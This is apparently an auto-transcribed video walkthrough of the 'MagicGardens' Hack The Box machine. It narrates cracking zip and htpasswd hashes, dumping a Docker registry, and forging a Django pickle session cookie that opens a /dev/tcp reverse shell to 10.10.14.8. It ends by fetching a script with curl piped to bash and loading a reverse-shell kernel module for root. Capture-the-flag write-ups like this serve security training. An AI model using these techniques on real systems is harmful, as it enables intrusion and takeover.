it's able to crack with that. So hashcat.bin, hashes, Magic Garden. That's not it. I did not put it in the hashes directory. There we go. Hashes, MagicGardens.zip, then opt word list rocku.txt. So let's see if it identifies this. If it doesn't, I'd probably try to run it in like maybe zip2john has a hashcat format or something, but it looks like it does detect it. It's just got conflicting hashes. So I'm going to try both of these. I'm going to guess it's the first one. If this doesn't work, then I would definitely try the second one. I don't know the difference between those two zips. Maybe like with the zip command, we could find it out, like zip info on it. But running it, it cracks near instantly. So we have the password REAL Madrid. So Real Madrid is going to be the password. I'm guessing the username is Alex. So let's go and try this real quick. We can do curl, what was it, HTTPS, and then 10.10.11.9. What port was that on? Probably 5,000 or 8,000? Okay, it looks like 5,000. And then was it V2? I'm going to specify Alex, Real Madrid. And we still get unauthorized. What is the other potential user on this? There was Morty. And still. Oh, wait. There was a zip file. I was getting ahead of myself. I'm going to make directory auth, cd auth 7zx, auth.zip. And this password was Real Madrid. And then inside of auth.zip, there's a htpasswd. and we get Alex Miles and then a bcrypt hash. So we have something else we have to crack. So let's go ahead and hashes MagicGardens.htpasswd, put this in, and we're going to need the user flag to crack this. So /hashcat -- users hashes opt word list rockq, and it's not plural. There we go. So it's a double crack. Let's see. We have to specify the mode. I'm going to guess it's just standard bcrypt. No indication that htpasswd would be using form CMS e-commerce or something like that. So let's start this one up and see what this cracks to. I don't think there's any way we can use that htpasswd file for like authentication. We have diamonds, and the user was, what was it, Alex Miles? I have it right there. So let's try this curl again, and we'll do Alex Miles diamonds. And there we go. We authenticate. So we could manually go and dump this. I think it's like catalog, and we see repositories MagicGardens.htb. And in the box registry 2, if you just go to my channel at ipsec.rocks and search it, you'll see us setting up Docker and just manually pulling this. But I'm not going to do that in this video because you have to set up like all the TLS and stuff, and that just takes a little while. But there is a Python script called Docker Registry Grabber, and that's just going to simplify the process because we don't have to configure TLS to authenticate, because Docker really doesn't like unsigned certificates. So we're going to pull this. So we can do git pull. Git clone, is it? Yeah. And then we go in Docker Registry Grabber, and then it's going to be drg.py. So let's make sure we can run this. No module named rich. So let's do python 3-m vm.venv. Let's create a virtual environment for this. Source vm bin activate pip3 install requirements.txt. And then now we should be able to do python 3 drg.py. Awesome. And let's see, it wants username Alex Miles, password was diamond, or is it diamonds? Diamonds. And let's see, we can do the list. And where's the host go? Oh, the URL is at the end. HTTP 10.10.11.9 port 5000, and that's HTTPS. There we go. Something screwed up. I don't know what. Failed to parse. I think it defaults to port 5000 because we have 5000 there. Oh, -p is there. Okay, there we go. So we have the list showing us there is the Docker MagicGardens.htb. So let's now do the dump command. So we'll do --dump MagicGardens.htb. You could also do probably dump all to dump everything, but I'm just going to grab this one, and it's going to download all the layers of the Docker. This can probably take a little while, so I'm going to pause the video and we'll resume when it's done. Okay, that is finished. If we do a ls, we have a new directory, MagicGardens.htb, which is the Docker container that we dumped. And if we cd into it, we have a bunch of tar files. So I'm going to extract all these. So we can do for I. Well, first you may try like tar-xf star.tar.gz, but I don't think tar supports like multiple archives in the command line. So we have to do it one by one. So that's why I do for I in ls, do tar-xf I done. So that's going to run a command for each one of these. And I guess we could look at it while it runs. So we're in MagicGardens auth Docker. So cd auth Docker Registry Grabber MagicGardens.htb. And we can see it's starting to create a directory because each one of these tars is a layer of the file system. So you can think of that kind of like commits in a Git file. Like the file system just has multiple versions. And yeah, we're just waiting for that to extract. I guess we could kind of look at it while it extracts. Let's see if we do, actually my computer just hung while it was extracting. So I'm just going to wait for this command to finish. Oh, it's already done. Awesome. So we have all the files here. I'm just going to make a directory called archive and then move all tar.gzs into it so it's a bit cleaner. And yeah, we have, looks like the Docker container. I wonder if we could just chroot into this. Maybe we have to do sudo. Does it work? It looks like it does. So now I'm just kind of in this Docker container. You don't have to do this. Normally when I go in containers, I'll chroot just so I can see it as it's a system. It's all personal preference here. So to figure out exactly what this is, so if we cat etc shadow, we don't have any hashes here. ls/root, nothing here. ls home, nothing there. ls opt, nothing there. Let's see. Find --name star.py. So we have a lot of Python here. Let's see. What do we have? I'm going to get rid of everything with lib. And we have a user source app. So if we go user source app, this is going to be the database for, or not database, the source code for probably MagicGardens.htb. We can cat the entry point and we can see how it's ran. There's also a SQLite database. Do we have SQL? I don't have SQLite on this. Hold on. Auth. So the downside with the chroot is I chrooted my SQLite away because I'm like the chroot makes the container your like slash is going to be that. So since SQLite's not installed in the container, I don't have it in my chroot. So let's do SQLite, then db.dump, and we can get extra users here. Let's see. We have Morty, ID. We probably should do like a select statement. We probably could get passwords. Let's see. grep-i pass. Let's see. Auth user, SQLite 3, db, SQLite. Select star from auth user. And there we go. We have the password hash for Morty. And this doesn't actually get us anything. This is just that one hash on the Django admin that we couldn't see, but I wanted to show accessing it. So what we can also do is look at the environment file. Let's see, find.-name. Let's just grep for env. It's .env. And we can see they have the secret key. And this is the secret key used to encrypt the cookie. So I'm going to make note of this. So v Django secret key like this. And there's one last thing we need to see. Let's see. What do we want to look at? Is it app? Was it manage.py? It's by settings. If we look at this, there we go. We can see it's using the pickle serializer for the session. And this is actually going to be deprecated. And I bet if we use like any type of like code scanning tool, it would auto detect this. Do I still have it hooked up in Visual Studio? Let's see. Go up one directory. Open it up. Hopefully my computer handles this. We do have Sneak. Please say it's still logged in. I am no longer logged in. I don't think. No. So I'm not going to load up in Sneak. I bet if we loaded in Sneak, it would say we're using pickle serializer because this is actually removed from Django. So if we Google Django, let's see, pickle serializer removed. Let's see. So Django 5 no longer supports it. It got removed somewhere in version 4. So yeah. And what this is the actual session cookie was a Python pickle. And if you know anything about Python pickles, if you control like what gets deserialized, you can get code execution. So I'm going to Google Django RCE pickle serializer to see if we can find any scripts that have a thing. And looking at this SCRT blog, we have remote code execution on a Facebook server. And this is the blog post that goes over it. It's a little bit old, but keep in mind, Django removed pickling a long time ago. And that's not good. Why is Cloudflare blocking us? Okay, maybe it didn't like Burp Suite or something. That's odd. So this is a post talking about how they found a Sentry server on Facebook, and they were able to exploit the Django serializer because I guess Sentry maybe used a static encryption thing. They may talk about it. I don't know exactly. The main thing I'm after is the proof of concept code right here. So we can copy this. And let's go back to our box. We have that secret key. I'm just going to move Django. We'll call it exploit.py. And we'll open this up in Visual Studio Code. Actually, I can move it into Pwn. Move exploit.py, Pwn. We'll call it Django Pwn.py. There we go. So if we open this, I'm going to comment out the secret key just so we have it. We're going to paste what we got from the blog post. And let's see, Django core signing. We probably have to install Django. So let's go ahead and do that. So let's do Django versions. Maybe download. Let's see. I don't want to get version 5. That's the thing I don't want to do because it's removed all the pickling. So maybe we want to do 4113. Let's try that one. Let's see if that works. So let's go into Pwn. I'll do python 3-m venv, and then create the venv directory. And then let's see. I wonder if I could do it from here. And if I do it from here, is my terminal going to be in it so it has it? I don't know. Source.venv bin activate, then pip3 install Django double equals. Then we want to do that version 4113. So we have successfully installed it. Use existing VM. There we go. And let's see, are we using the cpickle anywhere? I don't think so. So I can just remove this. Okay. So secret key. This is going to be the retrieved key. So we have this. So let's put that here. Then the cookie. So we have to grab a existing cookie from the application. So I'm just going to grab the one I have here. Or let's see, am I even still logged in? If not, let's make sure we're logged in. I am. Okay. I didn't know if it had like a expiration or something like that. So we can grab this cookie. We will paste it. Okay. Print. Why is that erroring? Separated by new lines. Oh. Because print needs. Is this a Python 2 script? Maybe. So let's see if we can run this. Python 3, Django Pwn. And let's see. We have something not liking. Django session. Where is this erroring? Contrib backend signed cookie. Timestamp. Let's see. Copy this. Can you help me fix this? Here is the error. Man, that is... There we go. Let's see if Copilot lets us fix this. A potential issue with loads and dumps function. Okay, let's try this code. Run this. Still errored. Grab, paste. So they import settings. From Django conf, import settings. This is how they do it. Okay, that looks like it worked. So it's just how we did settings, I'm guessing. So we have a cookie here. So I'm going to copy this. I'm going to go here. And the payload was sleep 30. If we look at it, this is what it's supposed to do. So if we refresh the page and it takes about 30 seconds, then it worked. So refreshed, it is thinking. So I'm thinking we're good. Burp Suite is disabled. So yeah, let's go ahead and try a different payload. So let's do a F string here. I'll do bash-c, bash-i. Then we'll do dev tcp. And I want to do sys.argv. I'll grab the second one. And then we can do sys. Did I screw that up? I did. There we go. argv 3, 0, and 1. Probably have to import sys. There we go. Let's see. That looks good. I did not close out my single quote. That looks better. And what I also want to do is attempt to send the cookie. So I don't have to go and edit my browser every time. So I'm going to import request. And then we're going to just do a request.get and http MagicGardens.htb. Like that. And then cookies session ID is equal to signed cookie. I think that is good. So I'm going to go over to a terminal. Let's do source.vm bin activate. So we're activated here. nc lvnp 9001, Python 3, Django pwn 10.10.14.8 9001. No module named request. Is it request? pip3 install request. Maybe that's not a default module. Signed cookie is not defined. I wonder if it's out of scope. Sys has, I need argv. Index out of range. Let's get rid of that. 1, 2. Okay, I need to change this to be argv1, argv2. There we go. And we got a shell. So if we wanted to leave it as 2, 3, we would just probably have this request get. We can do sys.argv1. So if we exit, we can start that up. Then we run it again. HTTP MagicGarden. I think it's plural. There we go. And get a shell. So now we're in a Docker container. We can tell because just the username, or not username, the host name looks like that. That's just common with Docker. So I'm going to import my PTY to fix my shell. Like that. Then stty raw minus echo foreground export term is equal to xterm. And we can clear the screen. So from here, I'm going to run a program called deepc. You could also do capsh print. And then if you look at all the capabilities, you can notice you probably have a dangerous one right here, the capsys module, which enables the Docker container to install kernel modules. But that's not easy to figure out. So a tool like deepc, so that's going to be DEP, deep, and then CE. This will definitely aid in that. So if we clone this, let's do git clone, deepc, in Python 3, HTTP server, curl 10.10.14.8, port 8000. Is it deepc.sh? Pipe it over to bash. And then it's just going to immediately run. And let's see what it finds. And I think linps will automatically use this tool now as well. So, yeah. So we have exploitable. That's just telling me what it is. User root, group root, useful tools, and it's highlighting everything we should look at. So cap DAC override, sys module. I wonder what this is. It's not highlighting the whole thing. So let's search hack tricks. This DAC read search, DAC override. What is this? Document not found. Okay, let's just look at capsys module. And then we have a page right here. I bet if we search hack tricks as well, see, there should be a specific page for this. We can just use the one here. Okay, so they give us a kernel module here, and then we just have to build the kernel module. And if you wanted to, deepc also has the ability to do this. So if we look at deepc, or looked at the pages, they have a exploit. We can go back real quick. downloading screenshots. So here they're exploiting the sock, exploiting privileged. So it has an exploit flag. And if we look at the source code, search for exploit. Where does it go? Exploit test. Come on. There we go. Prepare exploit. That's not it. Maybe it's near the bottom. I could have swore I just searched for this and then I found a list of all the exploits it had. Well, there's exploit Docker sock, exploit sysmodule. So here's where it's actually exploiting that. We can see how it works. It's making sure we have capsh, make, insmod, uname, making sure we have the capability here. And then it's literally going to write the kernel module to disk, write the make file to disk, and then compile and run it. So it's doing everything we're going to do manually. So that's why I'm not going to show using it in deep C, because we're just going to do it all by hand. So let's see. Hack tricks. There we go. This page may actually have DAC override. Let's see, permission, any file so you can write. I have to look more into that. I don't know it off the top of my head. So let's just go back to where we were with the sys module. And let's see. We need the source code. It's going to give it to us right here. So they hard code the IP. Oh, they're using 10.10.14.8. That's convenient for them. Thank you. So let's see. Do we have V? Let's go in dev shm V. What'd they call it? Reverse shell.c. Are you going to make me use nano? Okay, can't use either of them. So let's go ahead and make a www directory, and we'll just copy it here and then curl or w get them. So reverse shell.c, paste this, and then let's see, we already got the IP address, but I want to use 9001 instead of the 444. So this is just going to be a kernel module that as soon as it loads, it's going to call this command. So we have that, and then there is a make file. So we can copy this, paste. And I think this is going to error. Make files like tabs, not spaces, but we'll just see what happens. So now let's go ahead and start the web server up. Python 3-m http server wget http 10.10.14.8 8000 reverse shell.c wget, same thing except make file, then type make, and we get missing separator, stop. So I'm going to go ahead and replace those with a tab and see if that fixes it. We can remove that, wget it again, make. I wasn't standing the web server up. Missing separator. That should be fine. If I copy, What if it doesn't want a... Did I have a line break at the end or not? Let's see. I think that's line 4. Let's see, what's it saying? Cat et make file name? What? I guess that's just showing me everything. Put these back as tabs. We don't have any spaces. Let's get rid of... That's not it. Let's try running that cat command they had again. Oh. Oh my god, this is... I think Vim screwing something up. Because I hit tab, and it's not putting a tab, it's putting 2 spaces. That's got to be the error. I can't believe I'm going to do this. Hopefully Nano doesn't have that same behavior. Because yeah, these are definitely spaces. Erase those, tab. There's probably some code in Vim I can run to fix that. But now let's run this cat command again. See what it's supposed to look like. Yeah, so now we definitely have a tab. So if I do make, there we go. Oh god, I can't believe that. That was annoying. rm make file. Let's stand up my HTTP server. wget make, and there we go. We're building. Awesome. So we should have the reverse shell. We do. So let's go back over to the instructions. So we have just random make to compile, and then we load the ko file. So let's go ahead and do this insmod command. Let's do nc lvnp 9001 insmod reverse shell.kl. And there we go. We have now rooted the box because we loaded that kernel module. It executes the reverse shell, and we go into /root of the host, which is where root.txt is. So hope you guys enjoyed the video. Take care, and I'll see you all next time. Actually, wait 1 second. I just want to test something real quick. If I edit this make file, then I write, okay, the tab's still there. I was curious if that would happen whenever I wrote the file. But you can see this is definitely a tab now instead of a space. So with that being said, that's the video. Take care, and I will see you all next time.